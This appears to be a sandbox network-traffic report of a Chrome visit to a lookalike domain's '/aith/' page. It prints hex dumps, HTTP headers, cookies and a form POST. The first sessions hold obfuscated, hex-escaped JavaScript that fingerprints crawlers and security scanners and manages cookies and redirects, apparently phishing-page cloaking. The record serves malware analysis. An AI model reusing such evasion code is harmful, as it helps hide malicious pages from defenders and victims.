                                                2024-10-29 23:22:18 UTC1369INData Raw: 36 33 5c 78 36 38 5c 78 34 35 5c 78 37 36 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 32 38 5c 78 32 32 5c 78 36 46 5c 78 36 45 5c 78 37 32 5c 78 36 35 5c 78 36 31 5c 78 36 34 5c 78 37 39 5c 78 37 33 5c 78 37 34 5c 78 36 31 5c 78 37 34 5c 78 36 35 5c 78 36 33 5c 78 36 38 5c 78 36 31 5c 78 36 45 5c 78 36 37 5c 78 36 35 5c 78 32 32 5c 78 32 43 5c 78 32 30 5c 78 36 32 5c 78 32 39 5c 78 37 44 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 36 32 5c 78 32 38 5c 78 36 36 5c 78 37 35 5c 78 36 45 5c 78 36 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 38 5c 78 32 39 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                Data Ascii: 63\x68\x45\x76\x65\x6E\x74\x28\x22\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65\x22\x2C\x20\x62\x29\x7D\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\
                                                2024-10-29 23:22:18 UTC1369INData Raw: 37 5c 78 33 42 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 37 30 5c 78 36 39 5c 78 37 32 5c 78 36 35 5c 78 37 33 5c 78 33 44 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 35 37 5c 78 36 35 5c 78 36 34 5c 78 32 43 5c 78 32 30 5c 78 33 33 5c 78 33 30 5c 78 32 44 5c 78 34 46 5c 78 36 33 5c 78 37 34 5c 78 32 44 5c 78 33 32 5c 78 33 34 5c 78 32 30 5c 78 33 32 5c 78 33 33 5c 78 33 41 5c 78 33 32 5c 78 33 32 5c 78 33 41 5c 78 33 31 5c 78 33 33 5c 78 32 30 5c 78 34 37 5c 78 34 44 5c 78 35 34 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 33 42 5c 78 32 30 5c 78 37 30 5c 78 36 31 5c 78 37 34 5c 78 36 38 5c 78 33 44 5c 78 32 46 5c 78 32 37 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                Data Ascii: 7\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D\x27\x20\x2B\x20\x27\x57\x65\x64\x2C\x20\x33\x30\x2D\x4F\x63\x74\x2D\x32\x34\x20\x32\x33\x3A\x32\x32\x3A\x31\x33\x20\x47\x4D\x54\x27\x20\x2B\x20\x27\x3B\x20\x70\x61\x74\x68\x3D\x2F\x27\x3B\x0A\x20\x20\x20\x20\x20\x
                                                2024-10-29 23:22:18 UTC1369INData Raw: 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 35 5c 78 36 44 5c 78 36 39 5c 78 37 34 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 36 33 5c 78 36 46 5c 78 37 35 5c 78 36 33 5c 78 36 38 5c 78 36 41 5c 78 37 33 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 37 33 5c 78 37 30 5c 78 36 31 5c 78 37 37 5c 78 36 45 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 37 32 5c 78 36 38 5c 78 36 39 5c 78 36 45 5c 78 36 46 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36
                                                Data Ascii: \x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x65\x6D\x69\x74\x29\x7B\x2F\x2A\x63\x6F\x75\x63\x68\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x73\x70\x61\x77\x6E\x29\x7B\x2F\x2A\x72\x68\x69\x6E\x6F\x2A\x2F\x0A\x69\x66\x28\x21\x77\x6
                                                2024-10-29 23:22:18 UTC1369INData Raw: 78 37 43 5c 78 36 31 5c 78 36 43 5c 78 36 35 5c 78 37 38 5c 78 36 31 5c 78 37 43 5c 78 36 39 5c 78 36 31 5c 78 35 46 5c 78 36 31 5c 78 37 32 5c 78 36 33 5c 78 36 38 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 36 5c 78 36 31 5c 78 36 33 5c 78 36 35 5c 78 36 32 5c 78 36 46 5c 78 36 46 5c 78 36 42 5c 78 37 43 5c 78 37 34 5c 78 37 37 5c 78 36 39 5c 78 37 34 5c 78 37 34 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 43 5c 78 36 39 5c 78 36 45 5c 78 36 42 5c 78 36 35 5c 78 36 34 5c 78 36 39 5c 78 36 45 5c 78 37 43 5c 78 37 30 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 36 34 5c 78 36 46 5c 78 36 44 5c 78 32 46 5c 78 36 39 5c 78 32 45 5c 78 37 34 5c 78 36 35 5c 78 37 33 5c 78 37 34 5c 78 32 38 5c 78 36 45 5c 78 36 31 5c 78 37 36 5c 78 36 39
                                                Data Ascii: x7C\x61\x6C\x65\x78\x61\x7C\x69\x61\x5F\x61\x72\x63\x68\x69\x76\x65\x72\x7C\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x74\x77\x69\x74\x74\x65\x72\x7C\x6C\x69\x6E\x6B\x65\x64\x69\x6E\x7C\x70\x69\x6E\x67\x64\x6F\x6D\x2F\x69\x2E\x74\x65\x73\x74\x28\x6E\x61\x76\x69
                                                2024-10-29 23:22:18 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                Data Ascii: 20\x20\x20\x20\x20\x2F\x2A\x7D\x2A\x2F\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                                2024-10-29 23:22:18 UTC1369INData Raw: 30 5c 78 34 33 5c 78 36 38 5c 78 36 35 5c 78 36 33 5c 78 36 42 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 37 34 5c 78 36 38 5c 78 36 35 5c 78 32 30 5c 78 36 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 36 39 5c 78 37 33 5c 78 37 34 5c 78 37 33 5c 78 32 30 5c 78 36 31 5c 78 36 45 5c 78 36 34 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 36 39 5c 78 37 34 5c 78 32 30 5c 78 36 38 5c 78 36 31 5c 78 37 33 5c 78 32 30 5c 78 36 39 5c 78 36 45 5c 78 37 30 5c 78 37 35 5c 78 37 34 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 36 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 37 33 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 32 38 5c 78 36 36 5c 78 36 39 5c 78 37 32 5c 78 37 33 5c 78 37 34 5c 78
                                                Data Ascii: 0\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x66\x6F\x72\x6D\x20\x65\x78\x69\x73\x74\x73\x20\x61\x6E\x64\x20\x69\x66\x20\x69\x74\x20\x68\x61\x73\x20\x69\x6E\x70\x75\x74\x20\x65\x6C\x65\x6D\x65\x6E\x74\x73\x0A\x69\x66\x20\x28\x66\x69\x72\x73\x74\x
                                                2024-10-29 23:22:18 UTC1369INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 32 30 5c 78 33 44 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                Data Ascii: \x20\x20\x20\x20\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x20\x3D\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
                                                2024-10-29 23:22:18 UTC1369INData Raw: 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 44 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 37 33 5c 78 36 35 5c 78 32 30 5c 78 37 42
                                                Data Ascii: x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7D\x20\x65\x6C\x73\x65\x20\x7B


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.46133735.190.80.14438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:18 UTC549OUTOPTIONS /report/v4?s=juk1jZp%2F50rc8sadSn%2BJEC3ihwPx978HFKpo4QDgdXrM2EFBmJgsXMcbs%2Bs52VXQpVkKwzsMTAnVKul0JdNxLj%2BGR2DhquxoLhGIGhVP%2Fh8hdyaHiu2qOqK3wBcu0vWS2yvT%2BCQ%3D HTTP/1.1
                                                Host: a.nel.cloudflare.com
                                                Connection: keep-alive
                                                Origin: https://dsllnnovations.com
                                                Access-Control-Request-Method: POST
                                                Access-Control-Request-Headers: content-type
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-10-29 23:22:18 UTC336INHTTP/1.1 200 OK
                                                Content-Length: 0
                                                access-control-max-age: 86400
                                                access-control-allow-methods: OPTIONS, POST
                                                access-control-allow-origin: *
                                                access-control-allow-headers: content-length, content-type
                                                date: Tue, 29 Oct 2024 23:22:18 GMT
                                                Via: 1.1 google
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.46134235.190.80.14438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:19 UTC488OUTPOST /report/v4?s=juk1jZp%2F50rc8sadSn%2BJEC3ihwPx978HFKpo4QDgdXrM2EFBmJgsXMcbs%2Bs52VXQpVkKwzsMTAnVKul0JdNxLj%2BGR2DhquxoLhGIGhVP%2Fh8hdyaHiu2qOqK3wBcu0vWS2yvT%2BCQ%3D HTTP/1.1
                                                Host: a.nel.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 395
                                                Content-Type: application/reports+json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-10-29 23:22:19 UTC395OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 30 33 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 38 2e 32 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 64 73 6c 6c 6e 6e 6f 76 61 74 69 6f 6e 73
                                                Data Ascii: [{"age":2,"body":{"elapsed_time":2031,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.148.212","status_code":503,"type":"http.error"},"type":"network-error","url":"https://dsllnnovations
                                                2024-10-29 23:22:19 UTC168INHTTP/1.1 200 OK
                                                Content-Length: 0
                                                date: Tue, 29 Oct 2024 23:22:19 GMT
                                                Via: 1.1 google
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.461345172.67.148.2124438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:19 UTC1117OUTPOST /aith/ HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                Content-Length: 22
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                NVI98Bif23qg5UiOeNAjEVNZyG8: 49343053
                                                X-Requested-TimeStamp-Expire:
                                                sec-ch-ua-mobile: ?0
                                                X-Requested-TimeStamp-Combination:
                                                X-Requested-Type-Combination: GET
                                                Content-type: application/x-www-form-urlencoded
                                                X-Requested-Type: GET
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                X-Requested-with: XMLHttpRequest
                                                X-Requested-TimeStamp:
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://dsllnnovations.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://dsllnnovations.com/aith/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk
                                                2024-10-29 23:22:19 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                                Data Ascii: name1=Henry&name2=Ford
                                                2024-10-29 23:22:20 UTC1320INHTTP/1.1 204 No Content
                                                Date: Tue, 29 Oct 2024 23:22:20 GMT
                                                Connection: close
                                                X-Content-Type-Options: nosniff
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1; mode=block
                                                X-XSS-Protection: 1; mode=block
                                                Set-Cookie: VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk; path=/; expires=Wed, 30-Oct-24 23:22:16 GMT; Max-Age=86400;
                                                Set-Cookie: S90wx7Zqxdox0MTF-hx9d5HWxWc=1730244136; path=/; expires=Wed, 30-Oct-24 23:22:16 GMT; Max-Age=86400;
                                                Set-Cookie: uiFRXvUC2urtpaT39U3kjRWeybs=1730330536; path=/; expires=Wed, 30-Oct-24 23:22:16 GMT; Max-Age=86400;
                                                Set-Cookie: 0CFu03wo8SjaBEdSDXJPVEj_U2o=7M3_LIl-0xUtCH1U9qUtTseZ-A0; path=/; expires=Wed, 30-Oct-24 23:22:16 GMT; Max-Age=86400;
                                                X-Frame-Options: SAMEORIGIN
                                                Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Pragma: no-cache
                                                Expires: 0
                                                X-Server-Powered-By: Engintron
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlWMpHKIuqzoqa6A3zUYwBM6UgZps9Zf07IY3eSCgXNWiGn%2By5Y39K9oi%2FiHcgFuqJKNhjj993G2GInZ8T9vRK1l9BkNKstD55BiVFuEUjw3BzAVxDYw0589OXyamQ21BS6xq4c%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e8309bd53ab6-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-29 23:22:20 UTC191INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 31 33 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 34 38 26 72 65 63 76 5f 62 79 74 65 73 3d 31 37 33 39 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 34 30 35 33 31 35 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 38 36 38 62 38 32 35 36 34 61 30 35 32 65 38 26 74 73 3d 36 37 35 26 78 3d 30 22 0d 0a 0d 0a
                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1739&delivery_rate=2405315&cwnd=251&unsent_bytes=0&cid=b868b82564a052e8&ts=675&x=0"


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.461344172.67.148.2124438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:19 UTC856OUTGET /favicon.ico HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://dsllnnovations.com/aith/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk
                                                2024-10-29 23:22:19 UTC1054INHTTP/1.1 403 Forbidden
                                                Date: Tue, 29 Oct 2024 23:22:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                X-Content-Type-Options: nosniff
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1; mode=block
                                                X-XSS-Protection: 1; mode=block
                                                Cache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutable
                                                Pragma: public
                                                CF-Cache-Status: HIT
                                                Age: 536356
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2BadovzQ5hoW%2FvOxGQpdTWBrzUXP9pS801ARFBreA8pYNxdqGCm4KOVIyuXiMGzX7J9hOBjhkLkhVfoaZEb4JcLnj%2BCs9CZoXgY22Wze5CYYRoVNVO%2FUnat3LdOPTR0IpMrji7g%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e830bf804696-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1434&delivery_rate=2427493&cwnd=251&unsent_bytes=0&cid=af9448911ec17344&ts=162&x=0"
                                                2024-10-29 23:22:19 UTC315INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                2024-10-29 23:22:19 UTC240INData Raw: 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a
                                                Data Ascii: and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                2024-10-29 23:22:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.461346172.67.148.2124438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:19 UTC788OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk
                                                2024-10-29 23:22:19 UTC894INHTTP/1.1 302 Found
                                                Date: Tue, 29 Oct 2024 23:22:19 GMT
                                                Content-Length: 0
                                                Connection: close
                                                location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/f2bbd6738e15/main.js?
